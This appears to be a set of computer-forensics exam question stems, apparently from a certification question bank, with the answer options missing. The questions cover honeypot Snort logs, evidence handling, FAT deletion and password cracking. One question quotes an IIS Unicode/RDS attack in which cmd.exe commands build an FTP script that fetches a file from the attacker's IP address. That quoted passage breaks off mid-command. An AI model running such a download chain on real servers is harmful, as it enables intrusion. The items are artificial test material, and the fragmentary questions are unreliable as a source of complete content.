Study the log given below and answer the following question:

Apr 24 14:46:46 [4663]: spp_portscan: portscan detected from 194.222.156.169
Apr 24 14:46:46 [4663]: IDS27/FIN Scan: 194.222.156.169:56693 -> 172.16.1.107:482
Apr 24 18:01:05 [4663]: IDS/DNS-version-query: 212.244.97.121:3485 -> 172.16.1.107:53
Apr 24 19:04:01 [4663]: IDS213/ftp-passwd-retrieval: 194.222.156.169:1425 -> 172.16.1.107:21
Apr 25 08:02:41 [5875]: spp_portscan: PORTSCAN DETECTED from 24.9.255.53
Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4499 -> 172.16.1.107:53
Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4630 -> 172.16.1.101:53
Apr 25 02:38:17 [5875]: IDS/RPC-rpcinfo-query: 212.251.1.94:642 -> 172.16.1.107:111
Apr 25 19:37:32 [5875]: IDS230/web-cgi-space-wildcard: 198.173.35.164:4221 -> 172.16.1.107:80
Apr 26 05:45:12 [6283]: IDS212/dns-zone-transfer: 38.31.107.87:2291 -> 172.16.1.101:53
Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53
Apr 26 06:44:25 victim7 PAM_pwdb[12509]: (login) session opened for user simple by (uid=0)
Apr 26 06:44:36 victim7 PAM_pwdb[12521]: (su) session opened for user simon by simple(uid=506)
Apr 26 06:45:34 [6283]: IDS175/socks-probe: 24.112.167.35:20 -> 172.16.1.107:1080
Apr 26 06:52:10 [6283]: IDS127/telnet-login-incorrect: 172.16.1.107:23 -> 213.28.22.189:4558

Precautionary measures to prevent this attack would include writing firewall rules. Of these firewall rules, which among the following would be appropriate?
When monitoring for both intrusion and security events between multiple computers, it is essential that the computers' clocks are synchronized. Synchronized time allows an administrator to reconstruct what took place during an attack against multiple computers. Without synchronized time, it is very difficult to determine exactly when specific events took place and how events interlace. What is the name of the service used to synchronize time among multiple computers?
When investigating a potential e-mail crime, what is your first step in the investigation?
If a suspect computer is located in an area that may have toxic chemicals, you must:
The following excerpt is taken from a honeypot log. The log captures activities across three days. There are several intrusion attempts; however, a few are successful. (Note: The objective of this question is to test whether the student can read basic information from log entries and interpret the nature of attack.)

Apr 24 14:46:46 [4663]: spp_portscan: portscan detected from 194.222.156.169
Apr 24 14:46:46 [4663]: IDS27/FIN Scan: 194.222.156.169:56693 -> 172.16.1.107:482
Apr 24 18:01:05 [4663]: IDS/DNS-version-query: 212.244.97.121:3485 -> 172.16.1.107:53
Apr 24 19:04:01 [4663]: IDS213/ftp-passwd-retrieval: 194.222.156.169:1425 -> 172.16.1.107:21
Apr 25 08:02:41 [5875]: spp_portscan: PORTSCAN DETECTED from 24.9.255.53
Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4499 -> 172.16.1.107:53
Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4630 -> 172.16.1.101:53
Apr 25 02:38:17 [5875]: IDS/RPC-rpcinfo-query: 212.251.1.94:642 -> 172.16.1.107:111
Apr 25 19:37:32 [5875]: IDS230/web-cgi-space-wildcard: 198.173.35.164:4221 -> 172.16.1.107:80
Apr 26 05:45:12 [6283]: IDS212/dns-zone-transfer: 38.31.107.87:2291 -> 172.16.1.101:53
Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53
Apr 26 06:44:25 victim7 PAM_pwdb[12509]: (login) session opened for user simple by (uid=0)
Apr 26 06:44:36 victim7 PAM_pwdb[12521]: (su) session opened for user simon by simple(uid=506)
Apr 26 06:45:34 [6283]: IDS175/socks-probe: 24.112.167.35:20 -> 172.16.1.107:1080
Apr 26 06:52:10 [6283]: IDS127/telnet-login-incorrect: 172.16.1.107:23 -> 213.28.22.189:4558

From the options given below choose the one which best interprets the following entry:

Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53
What happens when a file is deleted by a Microsoft operating system using the FAT file system?
The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini. He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes an RDS query which results in the commands run as shown below.

“cmd1.exe /c open 213.116.251.162 >ftpcom”
“cmd1.exe /c echo johna2k >>ftpcom”
“cmd1.exe /c echo haxedj00 >>ftpcom”
“cmd1.exe /c echo get n
When reviewing web logs, you see an entry for resource not found in the HTTP status code file. What is the actual error code that you would see in the log for resource not found?
You are called in to assist the police in an investigation involving a suspected drug dealer. The suspect's house was searched by the police after a warrant was obtained, and they located a floppy disk in the suspect's bedroom. The disk contains several files, but they appear to be password protected. What are two common methods used by password cracking software that you can use to obtain the password?
When examining a hard disk without a write-blocker, you should not start Windows because Windows will write data to the: